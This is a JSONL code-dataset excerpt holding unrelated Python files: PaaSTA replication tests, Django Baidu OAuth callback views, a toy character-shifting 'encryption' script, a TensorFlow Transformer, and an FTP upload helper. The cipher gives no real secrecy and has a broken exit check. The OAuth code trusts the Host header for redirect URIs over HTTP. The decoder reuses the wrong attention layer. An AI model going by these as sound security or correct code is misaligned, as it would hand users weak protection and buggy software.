all_tasks_or_pods=all_tasks,\n replication_checker=None,\n )\n mock_check_replication_for_service.assert_called_once_with(\n instance_config=instance_config,\n expected_count=100,\n replication_checker=None,\n )\n\n\ndef test_check_service_replication_for_smartstack_with_different_namespace(\n instance_config,\n):\n instance_config.get_instances.return_value = 100\n all_tasks = []\n with mock.patch(\n \"paasta_tools.check_marathon_services_replication.get_proxy_port_for_instance\",\n autospec=True,\n return_value=666,\n ), mock.patch(\n \"paasta_tools.monitoring_tools.check_replication_for_instance\", autospec=True,\n ) as mock_check_replication_for_service, mock.patch(\n \"paasta_tools.check_marathon_services_replication.check_healthy_marathon_tasks_for_service_instance\",\n autospec=True,\n ) as mock_check_healthy_marathon_tasks:\n instance_config.get_registrations.return_value = [\"some-random-other-namespace\"]\n check_marathon_services_replication.check_service_replication(\n instance_config=instance_config,\n all_tasks_or_pods=all_tasks,\n replication_checker=None,\n )\n assert not mock_check_replication_for_service.called\n mock_check_healthy_marathon_tasks.assert_called_once_with(\n instance_config=instance_config, expected_count=100, all_tasks=[]\n )\n\n\ndef test_check_service_replication_for_non_smartstack(instance_config):\n instance_config.get_instances.return_value = 100\n\n with mock.patch(\n \"paasta_tools.check_marathon_services_replication.get_proxy_port_for_instance\",\n autospec=True,\n return_value=None,\n ), mock.patch(\n \"paasta_tools.check_marathon_services_replication.check_healthy_marathon_tasks_for_service_instance\",\n autospec=True,\n ) as mock_check_healthy_marathon_tasks:\n check_marathon_services_replication.check_service_replication(\n instance_config=instance_config,\n all_tasks_or_pods=[],\n replication_checker=None,\n )\n mock_check_healthy_marathon_tasks.assert_called_once_with(\n instance_config=instance_config, expected_count=100, all_tasks=[]\n )\n\n\ndef _make_fake_task(app_id, **kwargs):\n kwargs.setdefault(\"started_at\", datetime(1991, 7, 5, 6, 13, 0, tzinfo=timezone.utc))\n return mock.Mock(app_id=app_id, **kwargs)\n\n\ndef test_filter_healthy_marathon_instances_for_short_app_id_correctly_counts_alive_tasks():\n fakes = []\n for i in range(0, 4):\n fake_task = _make_fake_task(f\"/service.instance.foo{i}.bar{i}\")\n mock_result = mock.Mock(alive=i % 2 == 0)\n fake_task.health_check_results = [mock_result]\n fakes.append(fake_task)\n actual = check_marathon_services_replication.filter_healthy_marathon_instances_for_short_app_id(\n app_id=\"service.instance\", all_tasks=fakes\n )\n assert actual == 2\n\n\ndef test_filter_healthy_marathon_instances_for_short_app_id_considers_new_tasks_not_healthy_yet():\n one_minute = timedelta(minutes=1)\n fakes = []\n for i in range(0, 4):\n fake_task = _make_fake_task(\n f\"/service.instance.foo{i}.bar{i}\",\n # when i == 0, produces a task that has just started (not healthy yet)\n # otherwise produces a task that was started over a minute ago (healthy)\n started_at=datetime.now(timezone.utc) - one_minute * i,\n )\n\n mock_result = mock.Mock(alive=True)\n fake_task.health_check_results = [mock_result]\n fakes.append(fake_task)\n actual = check_marathon_services_replication.filter_healthy_marathon_instances_for_short_app_id(\n all_tasks=fakes, app_id=\"service.instance\"\n )\n assert actual == 3\n\n\ndef test_get_healthy_marathon_instances_for_short_app_id_considers_none_start_time_unhealthy():\n fake_task = _make_fake_task(\"/service.instance.foo.bar\", started_at=None)\n mock_result = mock.Mock(alive=True)\n fake_task.health_check_results = [mock_result]\n fakes = [fake_task]\n actual = check_marathon_services_replication.filter_healthy_marathon_instances_for_short_app_id(\n all_tasks=fakes, app_id=\"service.instance\"\n )\n assert actual == 0\n\n\n@mock.patch(\n \"paasta_tools.monitoring_tools.send_replication_event_if_under_replication\",\n autospec=True,\n)\n@mock.patch(\n \"paasta_tools.check_marathon_services_replication.filter_healthy_marathon_instances_for_short_app_id\",\n autospec=True,\n) # noqa\ndef test_check_healthy_marathon_tasks_for_service_instance(\n mock_healthy_instances,\n mock_send_replication_event_if_under_replication,\n instance_config,\n):\n mock_healthy_instances.return_value = 2\n check_marathon_services_replication.check_healthy_marathon_tasks_for_service_instance(\n instance_config=instance_config, expected_count=10, all_tasks=mock.Mock()\n )\n mock_send_replication_event_if_under_replication.assert_called_once_with(\n instance_config=instance_config, expected_count=10, num_available=2\n )\n","sub_path":"tests/test_check_marathon_services_replication.py","file_name":"test_check_marathon_services_replication.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"327016524","text":"# coding=utf-8\n# Date:2014/7/25\n# Email:wangjian2254@gmail.com\nimport json\nimport urllib\nimport urllib2\nimport time\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth import login as auth_login\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.utils import timezone\n\n\n# from riliusers.views_user import setLoginOrg\nfrom needserver.jifenutil import create_data_jifen\nfrom needserver.models import Social, Project, Person, Group\nfrom util.jsonresult import getResult\nfrom util.loginrequired import client_login_required, client_login_required_widthout_tel\nfrom Need_Server.settings import BAE_AK, BAE_SK, FENXIANG\n\n__author__ = u'王健'\n\n\ndef client_social_callback(request):\n \"\"\"\n 手机端 社会化注册\n by:王健 at:2015-1-15\n 手机端 社会化注册,优化\n by:王健 at:2015-1-25\n :param request:\n :return:\n \"\"\"\n result, social = social_callback(request, 'client')\n if result:\n return HttpResponseRedirect('/ns/client_social_result?result=true&media_type=%s&media_uid=%s&key=%s' % (social.media_type, social.media_uid, social.expires_in))\n\n else:\n return HttpResponseRedirect('/ns/client_social_result?result=false')\n\n\ndef client_social_result(request):\n \"\"\"\n 手机端 社会化注册, 结果页\n by:王健 at:2015-1-25\n :param request:\n :return:\n \"\"\"\n return HttpResponse()\n\n\n\ndef client_add_social_callback(request):\n \"\"\"\n 手机端 ���会化账号 绑定\n by:王健 at:2015-1-15\n 手机端 社会化绑定,优化\n by:王健 at:2015-1-25\n :param request:\n :return:\n \"\"\"\n result, social = social_callback(request, 'client_add')\n # result, social = social_callback(request, 'client')\n if result:\n return HttpResponseRedirect('/ns/client_social_result?result=true&media_type=%s&media_uid=%s&key=%s' % (social.media_type, social.media_uid, social.expires_in))\n\n else:\n return HttpResponseRedirect('/ns/client_social_result?result=false')\n\n\n\ndef web_social_callback(request):\n \"\"\"\n web端社会化注册\n by:王健 at:2015-1-15\n :param request:\n :return:\n \"\"\"\n result, social = social_callback(request, 'web')\n if result:\n if social.user.tel == None:\n return HttpResponseRedirect('/web/reg_tel')\n else:\n return HttpResponseRedirect('/web/')\n else:\n return HttpResponseRedirect(social)\n\n\n@client_login_required\ndef web_add_social_callback(request):\n \"\"\"\n web端社会化,绑定社会化账号\n by:王健 at:2015-1-16\n :param request:\n :return:\n \"\"\"\n result, social = social_callback(request, 'web_add')\n if result:\n return HttpResponseRedirect('/web/')\n else:\n return HttpResponseRedirect(social)\n\n\ndef social_callback(request, client='client'):\n \"\"\"\n 社会化登陆的回调接口\n by:王健 at:2015-1-3\n 设置失败后的 url,不同的客户端有不同的url\n by:王健 at:2015-1-15\n 防止None被split\n by:王健 at:2015-3-18\n 解决百度社会化登陆问题\n by:尚宗凯 at:2015-4-1\n 百度社会化登陆去掉头像设置\n by:尚宗凯 at:2015-4-1\n 根据客户端访问的 host变化\n by:尚宗凯 at:2015-4-3\n :param request:\n :return:\n \"\"\"\n code = request.REQUEST.get('code')\n state = request.REQUEST.get('state', '')\n url = 'http://openapi.baidu.com/social/oauth/2.0/token'\n host = request.META.get('HTTP_HOST', '').lower()\n values = {'grant_type': 'authorization_code',\n 'code': code,\n 'client_id': BAE_AK,\n 'client_secret': BAE_SK,\n # 'redirect_uri': 'http://needserver.duapp.com/ns/%s_social_callback' % client}\n 'redirect_uri': 'http://%s/ns/%s_social_callback' % (host, client)\n }\n\n timeline = int(time.mktime(timezone.now().timetuple()))\n data = urllib.urlencode(values)\n req = urllib2.Request(url, data)\n response = urllib2.urlopen(req)\n html = response.read()\n result = json.loads(html)\n if result.has_key(\"error_code\"):\n url = 'https://openapi.baidu.com/social/oauth/2.0/authorize?response_type=code&state=%s&client_id=SyeExPLiXrkTwBK9GUYFLAok&redirect_uri=http://%s/ns/%s_social_callback&media_type=%s' % (\n state, host, client, state.split('_')[0])\n return False, url\n\n\n #判断是否已经具有社会化登陆了,没有就新建\n if not Social.objects.filter(media_type=result.get('media_type'), media_uid=result.get('media_uid'),\n social_uid=result.get('social_uid')).exists():\n if request.user.is_authenticated():\n user = request.user\n else:\n user = get_user_model()()\n user.name = result.get('name')\n user.save()\n social = Social()\n social.user = user\n social.token = result.get('access_token')\n social.expires_in = timeline + result.get('expires_in', 0)\n social.media_type = result.get('media_type')\n social.media_uid = result.get('media_uid')\n social.social_uid = result.get('social_uid')\n social.session_key = result.get('session_key')\n social.session_secret = result.get('session_secret')\n social.save()\n else:\n social = Social.objects.get(media_type=result.get('media_type'), media_uid=result.get('media_uid'),\n social_uid=result.get('social_uid'))\n social.token = result.get('access_token')\n social.expires_in = timeline + result.get('expires_in', 0)\n social.session_key = result.get('session_key')\n social.session_secret = result.get('session_secret')\n social.save()\n user = social.user\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n auth_login(request, user)\n # 判断是否带有 邀请标记,带有的话,就加入对应项目的root组\n if state.find('_project_') > 0 and len(state.split('_project_')) == 2:\n flag = state.split('_project_')[1]\n orgquery = Project.objects.filter(flag=flag)\n if orgquery.exists():\n org = orgquery[0]\n if Person.objects.filter(user=user, project=org, is_active=True).count() == 0:\n person, created = Person.objects.get_or_create(user=request.user, org=org)\n person.is_active = True\n person.save()\n group = Group.objects.get(project=org, flag='root')\n group.look_members.add(request.user)\n group.save()\n #如果用户没有头像,给用户下载一个头像\n # if not user.icon_url:\n # userinfo_url = 'https://openapi.baidu.com/social/api/2.0/user/info?access_token=%s' % result.get('access_token')\n # response_userinfo = urllib2.urlopen(userinfo_url)\n # html_userinfo = response_userinfo.read()\n # result_userinfo = json.loads(html_userinfo)\n # if result_userinfo.has_key('tinyurl'):\n # user.icon_url = result_userinfo.get('tinyurl')\n # user.save()\n\n\n return True, social\n\n\n\n@client_login_required\ndef get_user_social_list(request):\n p = []\n for social in request.user.social_set.all():\n p.append({'type': social.media_type, 'time': social.expires_in, 'token': social.token})\n return getResult(True, '', p)\n\n\n@client_login_required\ndef send_social_success(request):\n \"\"\"\n 分享社交软件获取积分\n by:王健 at:2015-2-5\n :param request:\n :return:\n \"\"\"\n return getResult(True, '', None, jifen=create_data_jifen(request, FENXIANG))\n\n#\n# @client_login_required\n# def add_social_callback(request):\n# code = request.REQUEST.get('code')\n# state = request.REQUEST.get('state')\n# url = 'http://openapi.baidu.com/social/oauth/2.0/token'\n# values = {'grant_type': 'authorization_code',\n# 'code': code,\n# 'client_id': BAE_AK,\n# 'client_secret': BAE_SK,\n# 'redirect_uri': 'http://liyuoa.duapp.com/riliusers/add_social_callback'}\n# timeline = int(time.mktime(timezone.now().timetuple()))\n# data = urllib.urlencode(values)\n# req = urllib2.Request(url, data)\n# response = urllib2.urlopen(req)\n# html = response.read()\n# result = json.loads(html)\n# if state.find('_user_') > 0 and len(state.split('_user_')) == 2:\n# flag = state.split('_user_')[1]\n# if result.has_key(\"error_code\"):\n# url = 'https://openapi.baidu.com/social/oauth/2.0/authorize?response_type=code&state=%s&client_id=SyeExPLiXrkTwBK9GUYFLAok&redirect_uri=http://liyuoa.duapp.com/riliusers/add_social_callback&media_type=%s&t=%s' % (\n# state, state.split('_')[0],timeline)\n# # return HttpResponse(u'请先登录账号,再绑定社交账号。继续 %s'% (url, result.get('error_code')))\n# return HttpResponseRedirect(url)\n# try:\n# social = Social.objects.get(social_uid=result.get('social_uid'))\n# except:\n# social = Social()\n# social.user = chatlogin.person.user\n# # social, created = Social.objects.get_or_create(user_id=chatlogin.person.user_id,\n# # media_type=result.get('media_type'),\n# # media_uid=result.get('media_uid'),\n# # social_uid=result.get('social_uid'))\n# if social.user == chatlogin.person.user:\n# user = social.user\n# social.token = result.get('access_token')\n# social.expires_in = timeline + result.get('expires_in', 0)\n# social.media_type = result.get('media_type')\n# social.media_uid = result.get('media_uid')\n# social.social_uid = result.get('social_uid')\n# social.session_key = result.get('session_key')\n# social.session_secret = result.get('session_secret')\n# social.save()\n# else:\n# return HttpResponse(u'该社交账号已经,绑定了另外一个账号。返回首页'% request.get_host())\n# if not user.icon:\n# userinfo_url = 'https://openapi.baidu.com/social/api/2.0/user/info?access_token=%s' % result.get('access_token')\n# response_userinfo = urllib2.urlopen(userinfo_url)\n# html_userinfo = response_userinfo.read()\n# result_userinfo = json.loads(html_userinfo)\n# if result_userinfo.has_key('tinyurl'):\n# user.icon = result_userinfo.get('tinyurl')\n# user.save()\n# for p in user.person_set.all():\n# if not p.icon:\n# p.icon = user.icon\n# p.save()\n# from util.jsonresult import cache\n# import uuid\n# uuid_flag = str(uuid.uuid4())\n# cache.set(uuid_flag, social.social_uid, 60 * 10)\n# return HttpResponseRedirect('/?uuid_flag=%s' % uuid_flag)\n\n#\n# @client_login_required\n# def add_social_code(request):\n# media_type = request.REQUEST.get('media_type')\n# from util.jsonresult import cache\n# import uuid\n#\n# uuid_flag = str(uuid.uuid4())\n# cache.set(uuid_flag, request.user.id, 60 * 10)\n# url = 'https://openapi.baidu.com/social/oauth/2.0/authorize?response_type=code&state=%s_user_%s&client_id=SyeExPLiXrkTwBK9GUYFLAok&redirect_uri=http://liyuoa.duapp.com/riliusers/add_social_callback&media_type=%s' % (\n# media_type, uuid_flag, media_type)\n# return HttpResponseRedirect(url)\n\n#\n# def assk_callback(request):\n# return getResult(True, '', \"assk_callback\")\n#\n#\n# def third_callback(request):\n# return getResult(True, '', \"third_callback\")\n#\n#\n# def yanzheng(request):\n# return HttpResponse('87407z1pWYlOEwXaITaLuFVzBlA')","sub_path":"needserver/views_social.py","file_name":"views_social.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"82678575","text":"#The program simply encrypts or decrypts your plain text messages!\r\nclass EncDec:\r\n #Function for the encryption process\r\n def Encodes():\r\n messageenc = input(\"Message: \")\r\n tempenc = messageenc\r\n messageenc = list(tempenc)#Adding the message to the list\r\n conversionenc = [ord(ch) for ch in messageenc]#Converting to ASCII numbers\r\n conversionenc1 = [(i + 101) for i in conversionenc]\r\n conversionenc = [(i * sec) for i in conversionenc1]\r\n conversionenc = [chr(ch) for ch in conversionenc]#Converting back to utf-8\r\n conversionenc = ''.join(str(e) for e in conversionenc)#Removing the brackets\r\n print(conversionenc)\r\n print('\\tCopy the above text and send to decrypt!\\n')\r\n print (\"-----------------------------------------------------------\")\r\n return\r\n #Function for the decryption process\r\n def Decodes():\r\n messagedec = input(\"Message: \")\r\n tempdec = messagedec\r\n messagedec = list(tempdec)#Adding the message to list\r\n conversiondec = [ord(ch) for ch in messagedec]#Converting to ASCII\r\n conversiondec2 = [(j // sec) for j in conversiondec]\r\n conversiondec = [(j - 101) for j in conversiondec2]\r\n conversiondec = [chr(ch) for ch in conversiondec]#Converting back to utf-8\r\n conversiondec = ''.join(str(e) for e in conversiondec)#Removing the brackets\r\n print(conversiondec)\r\n print('\\tYour message is displayed above.\\n')\r\n print (\"-----------------------------------------------------------\")\r\n return\r\n\r\n print(\"\\tWelcome to Cryptography\\n\")\r\n print('\\n')\r\n print(\"Make sure you have all the fonts installed in your system so that there is no any problem while encryption/decryption process.\")\r\n print()\r\n print(\"The key is the same through the process. Make sure you and your partner use the same key.\")\r\n print()\r\n #sec = int(input(\"Enter the secret key: \"))\r\n global sec #Making the variable global so it can be used to use as a key in enc/dec process\r\n sec = int(input(\"Enter the secret key: \"))\r\n looping = 1\r\n while (looping == 1):#For continuation of the program without exiting\r\n option = input(\"Encrypt, Decrypt or Exit? [e/d/x]\")\r\n if ((option == 'e') or (option == 'E')):\r\n Encodes()\r\n elif ((option == 'd') or (option == 'D')):\r\n Decodes()\r\n elif ((option != 'x') or (option != 'X')):\r\n print(\"Exiting....\")\r\n break\r\n else:\r\n print(\"Invalid key pressed!\\n\")\r\n print()\r\n exit() #Exits the program\r\n\r\n","sub_path":"CryptoFunction.py","file_name":"CryptoFunction.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"48825253","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/4/22 16:28\n# @Author : zdqzyx\n# @File : modeling.py\n# @Software: PyCharm\n\nimport tensorflow as tf\nimport numpy as np\n\ndef get_angles(pos, i, d_model):\n '''\n :param pos:单词在句子的位置\n :param i:单词在词表里的位置\n :param d_model:词向量维度大小\n :return:\n '''\n angle_rates = 1 / np.power(10000, (2 * (i//2)) / np.float32(d_model))\n return pos * angle_rates\n\ndef positional_encoding(position, d_model):\n '''\n :param position: 最大的position\n :param d_model: 词向量维度大小\n :return: [1, 最大position个数,词向量维度大小] 最后和embedding矩阵相加\n '''\n angle_rads = get_angles(np.arange(position)[:, np.newaxis],\n np.arange(d_model)[np.newaxis, :],\n d_model)\n # apply sin to even indices in the array; 2i\n angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])\n # apply cos to odd indices in the array; 2i+1\n angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])\n pos_encoding = angle_rads[np.newaxis, ...]\n return tf.cast(pos_encoding, dtype=tf.float32)\n\ndef point_wise_feed_forward_network(d_model, dff):\n return tf.keras.Sequential([\n tf.keras.layers.Dense(dff, activation='relu'), # (batch_size, seq_len, dff)\n tf.keras.layers.Dense(d_model) # (batch_size, seq_len, d_model)\n ])\n\n\ndef scaled_dot_product_attention(q, k, v, mask=None):\n '''计算attention\n q,k,v的第一维度必须相同\n q,k的最后一维必须相同\n k,v在倒数第二的维度需要相同, seq_len_k = seq_len_q=seq_len。\n 参数:\n q: 请求的形状 == (..., seq_len_q, d)\n k: 主键的形状 == (..., seq_len, d)\n v: 数值的形状 == (..., seq_len, d_v)\n mask: Float 张量,其形状能转换成\n (..., seq_len_q, seq_len)。默认为None。\n 返回值:\n 输出,注意力权重\n '''\n # (batch_size, num_heads, seq_len_q, d ) dot (batch_size, num_heads, d, seq_ken_k) = (batch_size, num_heads,, seq_len_q, seq_len)\n matmul_qk = tf.matmul(q, k, transpose_b=True)\n\n # 缩放matmul_qk\n dk = tf.cast(tf.shape(k)[-1], dtype=tf.float32)\n scaled_attention_logits = matmul_qk/tf.math.sqrt(dk)\n\n # 将 mask 加入到缩放的张量上。\n if mask is not None:\n # (batch_size, num_heads,, seq_len_q, seq_len) + (batch_size, 1,, 1, seq_len)\n scaled_attention_logits += (mask * -1e9)\n\n # softmax归一化权重 (batch_size, num_heads, seq_len)\n attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1)\n\n # seq_len_q个位置分别对应v上的加权求和\n # (batch_size, num_heads, seq_len) dot (batch_size, num_heads, d_v) = (batch_size, num_heads, seq_len_q, d_v)\n output = tf.matmul(attention_weights, v)\n return output, attention_weights\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n\n def __init__(self, d_model, num_heads):\n super(MultiHeadAttention, self).__init__()\n assert (d_model > num_heads) and (d_model % num_heads == 0)\n self.d_model = d_model\n self.num_heads = num_heads\n self.depth = d_model // num_heads\n\n self.qw = tf.keras.layers.Dense(d_model)\n self.kw = tf.keras.layers.Dense(d_model)\n self.vw = tf.keras.layers.Dense(d_model)\n self.dense = tf.keras.layers.Dense(d_model)\n\n def split_heads(self, x, batch_size):\n x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) # (batch_size, seq_len, num_heads, depth)\n return tf.transpose(x, perm=(0, 2, 1, 3)) # (batch_size, num_heads, seq_len, depth)\n\n\n def call(self, v, k, q, mask=None):\n # v = inputs\n batch_size = tf.shape(q)[0]\n\n q = self.qw(q) # (batch_size, seq_len_q, d_model)\n k = self.kw(k) # (batch_size, seq_len, d_model)\n v = self.vw(v) # (batch_size, seq_len, d_model)\n\n q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)\n k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len, depth)\n v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len, depth_v)\n\n # scaled_attention, (batch_size, num_heads, seq_len_q, depth_v)\n # attention_weights, (batch_size, num_heads, seq_len_q, seq_len)\n scaled_attention, attention_weights = scaled_dot_product_attention(q, k, v, mask)\n\n scaled_attention = tf.transpose(scaled_attention, perm=(0, 2, 1, 3)) # (batch_size, seq_len_q, num_heads, depth_v)\n concat_attention = tf.reshape(scaled_attention, shape=(batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model)\n\n output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model)\n return output, attention_weights\n\nclass EncoderLayer(tf.keras.layers.Layer):\n '''Encoder block\n 包括两个子层:1.多头注意力(有填充遮挡)2.点式前馈网络(Point wise feed forward networks)。\n out1 = BatchNormalization( x +(MultiHeadAttention(x, x, x)=>dropout))\n out2 = BatchNormalization( out1 + (ffn(out1) => dropout) )\n '''\n def __init__(self, d_model, num_heads, dff, rate=0.1):\n super(EncoderLayer, self).__init__()\n self.mha = MultiHeadAttention(d_model=d_model, num_heads=num_heads)\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n self.layer_norm1 = tf.keras.layers.BatchNormalization(epsilon=1e-6)\n self.layer_norm2 = tf.keras.layers.BatchNormalization(epsilon=1e-6)\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n\n def call(self, x, training, mask):\n attn_output, _ = self.mha(x, x, x, mask) # (batch_size, input_seq_len, d_model)\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layer_norm1(x+attn_output) # (batch_size, input_seq_len, d_model)\n\n ffn_output = self.ffn(out1) # (batch_size, input_seq_len, d_model)\n ffn_output = self.dropout2(ffn_output, training=training)\n out2 = self.layer_norm2(out1+ffn_output) # (batch_size, input_seq_len, d_model)\n return out2\n\nclass DecoderLayer(tf.keras.layers.Layer):\n ''' Decoder block\n 需要的子层:\n 1.遮挡的多头注意力(前瞻遮挡和填充遮挡)\n 2.多头注意力(用填充遮挡)。V(数值)和 K(主键)接收编码器输出作为输入。Q(请求)接收遮挡的多头注意力子层的输出。\n 3. 点式前馈网络\n out1 = BatchNormalization( x +(MultiHeadAttention(x, x, x)=>dropout))\n out2 = BatchNormalization( out1 +(MultiHeadAttention(enc_output, enc_output out1)=>dropout))\n out3 = BatchNormalization( out2 + (ffn => dropout) )\n '''\n def __init__(self, d_model, num_heads, dff, rate=0.1):\n super(DecoderLayer, self).__init__()\n\n self.mha1 = MultiHeadAttention(d_model, num_heads)\n self.mha2 = MultiHeadAttention(d_model, num_heads)\n\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layer_norm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n self.layer_norm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n self.layer_norm3 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n self.dropout3 = tf.keras.layers.Dropout(rate)\n\n def call(self, x, enc_output, training, look_ahead_mask, padding_mask):\n # x.shape == (batch_size, target_seq_len, d_model)\n # enc_output.shape == (batch_size, input_seq_len, d_model)\n attn1, attn_weights_block1 = self.mha1(x, x, x, look_ahead_mask) # (batch_size, target_seq_len, d_model)\n attn1 = self.dropout1(attn1, training=training)\n out1 = self.layer_norm1(x+attn1)\n\n attn2, attn_weights_block2 = self.mha1(enc_output, enc_output, out1, padding_mask) # (batch_size, target_seq_len, d_model)\n attn2 = self.dropout2(attn2, training=training)\n out2 = self.layer_norm2(out1+attn2)\n\n ffn_output = self.ffn(out2)\n ffn_output = self.dropout3(ffn_output, training=training)\n out3 = self.layer_norm3(out2+ffn_output) # (batch_size, target_seq_len, d_model)\n\n return out3, attn_weights_block1, attn_weights_block2\n\nclass Encoder(tf.keras.layers.Layer):\n '''\n 输入嵌入(Input Embedding)\n 位置编码(Positional Encoding)\n N 个编码器层(encoder layers)\n 输入经过嵌入(embedding)后,该嵌入与位置编码相加。该加法结果的输出是编码器层的输入。编码器的输出是解码器的输入。\n '''\n def __init__(self, num_layers, d_model, num_heads, dff, input_vocab_size, maximum_position_encoding, rate=0.1):\n super(Encoder, self).__init__()\n self.d_model = d_model\n self.num_layers = num_layers\n self.embedding = tf.keras.layers.Embedding(input_vocab_size, d_model)\n self.pos_encoding = positional_encoding(maximum_position_encoding, d_model)\n\n self.enc_layer = [EncoderLayer(d_model, num_heads, dff, rate) for _ in range(num_layers)]\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self, x, training, mask):\n # x.shape == (batch_size, seq_len)\n seq_len = tf.shape(x)[1]\n x = self.embedding(x) # (batch_size, input_seq_len, d_model)\n x *= tf.math.sqrt(tf.cast(self.d_model, dtype=tf.float32))\n x += self.pos_encoding[:, :seq_len, :]\n\n x = self.dropout(x, training=training)\n\n for i in range(self.num_layers):\n x = self.enc_layer[i](x, training, mask)\n return x #(batch_size, input_seq_len, d_model)\n\nclass Decoder(tf.keras.layers.Layer):\n '''解码器包括:\n 输出嵌入(Output Embedding)\n 位置编码(Positional Encoding)\n N 个解码器层(decoder layers)\n 目标(target)经过一个嵌入后,该嵌入和位置编码相加。该加法结果是解码器层的输入。解码器的输出是最后的线性层的输入。\n '''\n def __init__(self, num_layers, d_model, num_heads, dff, target_vocab_size, maximum_position_encoding, rate=0.1):\n super(Decoder, self).__init__()\n self.d_model = d_model\n self.num_layers = num_layers\n\n self.embedding = tf.keras.layers.Embedding(target_vocab_size, d_model)\n self.pos_encoding = positional_encoding(maximum_position_encoding, d_model)\n self.dec_layer = [DecoderLayer(d_model, num_heads, dff, rate) for _ in range(num_layers)]\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self, x, enc_output, training, look_ahead_mask, padding_mask):\n # x.shape==(batch_size, target_seq_len)\n # enc_output.shape==(batch_size, input_seq_len, d_model)\n seq_len = tf.shape(x)[1]\n attention_weights = {}\n\n x = self.embedding(x) # (batch_size, target_seq_len, d_model)\n x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n x += self.pos_encoding[:, :seq_len, :]\n x = self.dropout(x, training=training)\n\n for i in range(self.num_layers):\n x, block1, block2 = self.dec_layer[i](x, enc_output, training, look_ahead_mask, padding_mask)\n attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n # x.shape==(batch_size, target_seq_len, d_model)\n return x, attention_weights\n\n\nclass Transformer(tf.keras.Model):\n def __init__(self, params):\n super(Transformer, self).__init__()\n self.encoder = Encoder(params['num_layers'],params['d_model'],params['num_heads'],params['dff'],params['input_vocab_size'],params['pe_input'],params['rate'])\n self.decoder = Decoder(params['num_layers'],params['d_model'],params['num_heads'],params['dff'],params['target_vocab_size'],params['pe_target'],params['rate'])\n self.final_layer = tf.keras.layers.Dense(params['target_vocab_size'])\n\n def call(self, inp, tar, training, enc_padding_mask=None, look_ahead_mask=None, dec_padding_mask=None):\n # (batch_size, inp_seq_len, d_model)\n enc_output = self.encoder(inp, training, enc_padding_mask)\n # (batch_size, tar_seq_len, d_model)\n dec_output, attention_weights = self.decoder(tar, enc_output, training, look_ahead_mask, dec_padding_mask)\n final_output = self.final_layer(dec_output) # (batch_size, tar_seq_len, target_vocab_size)\n return final_output, attention_weights\n\n def build_graph(self, input_shape, target_shape):\n input_shape_nobatch = input_shape[1:]\n self.build(input_shape)\n inputs = tf.keras.Input(shape=input_shape_nobatch)\n if not hasattr(self, 'call'):\n raise AttributeError(\"User should define 'call' method in sub-class model!\")\n _ = self.call(inputs)\n\n\n\nif __name__=='__main__':\n parmas = {\n 'num_layers':2,\n 'd_model':512,\n 'num_heads' :8,\n 'dff' :2048,\n 'input_vocab_size' : 8500,\n 'target_vocab_size' :8000,\n 'pe_input' :10000,\n 'pe_target' : 6000,\n 'rate':0.1\n }\n\n model = Transformer(parmas)\n # model.build_graph(input_shape=(None, 400))\n # model.summary()\n temp_input = tf.random.uniform((64, 62))\n temp_target = tf.random.uniform((64, 26))\n\n fn_out, _ = model(temp_input, temp_target, training=True,\n enc_padding_mask=None,\n look_ahead_mask=None,\n dec_padding_mask=None)\n print(fn_out.shape)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Transformer/imp_by_tensorflow20_official/modeling.py","file_name":"modeling.py","file_ext":"py","file_size_in_byte":13597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"530264602","text":"import ftplib\nimport os\n\n# from sendSMS import *\nfrom sendMail import *\n\n# sendMail(title=\"PLM Crawling success file upload \", text=\"\\n\".join(update_list))\n\ndef ftpupload_file(dir, filename):\n\n from connection_info import get_connection_info\n\n # filename = \"OSU1.png\"\n ftp = ftplib.FTP()\n ftp.connect(get_connection_info(\"ftp_host\"), int(get_connection_info(\"ftp_port\"))) #Ftp 주소 Connect(주소 , 포트)\n ftp.login(get_connection_info(\"ftp_id\"), get_connection_info(\"ftp_pw\")) #login (ID, Password)\n ftp.cwd(get_connection_info(\"ftp_dir\")) #파일 전송할 Ftp 주소 (받을 주소)\n\n\n #기존 파일 삭제\n for something in ftp.nlst():\n # print(\"key:\", filename.split(\".\")[0]+\"_\")\n # if filename.split(\".\")[0]+\"_\" in something:\n if filename == something:\n print(\"Delete old file:\", something)\n ftp.delete(something)\n\n os.chdir(dir) #파일 전송 대상의 주소(보내는 주소)\n # print(os.getcwd())\n myfile = open(filename, 'rb') #Open( ~ ,'r') <= Text파일은 됨, Open( ~ ,'rb') <= 이미지파일 됨\n ftp.storbinary('STOR ' + filename, myfile)\n\n myfile.close()\n 